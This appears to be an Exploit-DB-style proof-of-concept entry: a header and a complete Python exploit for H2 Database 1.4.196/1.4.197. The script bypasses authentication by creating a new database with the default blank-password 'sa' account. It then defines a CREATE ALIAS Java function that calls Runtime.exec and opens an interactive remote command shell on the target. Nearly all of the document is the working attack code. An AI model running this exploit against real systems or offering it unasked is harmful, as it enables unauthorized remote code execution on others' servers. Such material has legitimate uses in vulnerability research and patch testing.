1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139 | # Exploit Title: H2 Database 1.4.196 - Remote Code Execution
# Google Dork: N/A
# Date: 2018-09-24
# Exploit Author: h4ckNinja
# Vendor Homepage: https://www.h2database.com/
# Software Link: http://www.h2database.com/h2-2018-03-18.zip
# Version: 1.4.196 and 1.4.197
# Tested on: macOS/Linux
# CVE: N/A
# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).
# When the test database has a password that is unknown, it is still possible to get the execution
# by creating a new database. The web console allows this by entering the name of the new database
# in the connection string. When the new database is created, the default credentials of
# username “sa” and password “” (blank) are created. The attacker is logged in automatically.
# The attached Python code, modified from 44422, demonstrates this.
#!/usr/bin/env python
'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac
Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
Modified from: https://www.exploit-db.com/exploits/44422/
'''
import random
import string
import sys
import argparse
import html
import requests
def getSession(host):
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')
return '{}/{}'.format(url, path)
def login(url, database):
data = {
'language': 'en',
'setting': 'Generic H2 (Embedded)',
'name': 'Generic H2 (Embedded)',
'driver': 'org.h2.Driver',
'url': database,
'user': 'sa',
'password': ''
}
print('[*] Attempting to create database')
r = requests.post(url, data=data)
if '<th class="login">Login</th>' in r.text:
return False
print('[+] Created database and logged in')
return True
def prepare(url):
cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'''
url = url.replace('login', 'query')
print('[*] Sending stage 1')
r = requests.post(url, data={'sql': cmd})
if not 'NullPointerException' in r.text:
print('[+] Shell succeeded - ^c or quit to exit')
return url
return False
def execve(url, cmd):
r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})
try:
execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace(' ',' ')).encode('utf-8').decode('utf-8','ignore')
print(execHTML)
except Exception as e:
print('[-] Invalid command (' + str(e) + ')')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
parser.add_argument('-H',
'--host',
dest='host',
metavar='127.0.0.1:8082',
help='Specify a host',
required=True)
parser.add_argument('-d',
'--database-url',
dest='database',
metavar='jdbc:h2:~/emptydb-' + randString,
default='jdbc:h2:~/emptydb-' + randString,
help='Database URL',
required=False)
args = parser.parse_args()
url = getSession(args.host)
if login(url, args.database):
success = prepare(url)
if success:
while True:
try:
cmd = input('h2-shell$ ')
if 'quit' not in cmd:
execve(success, cmd)
else:
print('[+] Shutting down')
sys.exit(0)
except KeyboardInterrupt:
print()
print('[+] Shutting down')
sys.exit(0)
else:
print('[-] Something went wrong injecting the payload.')
else:
print('[-] Unable to login')
|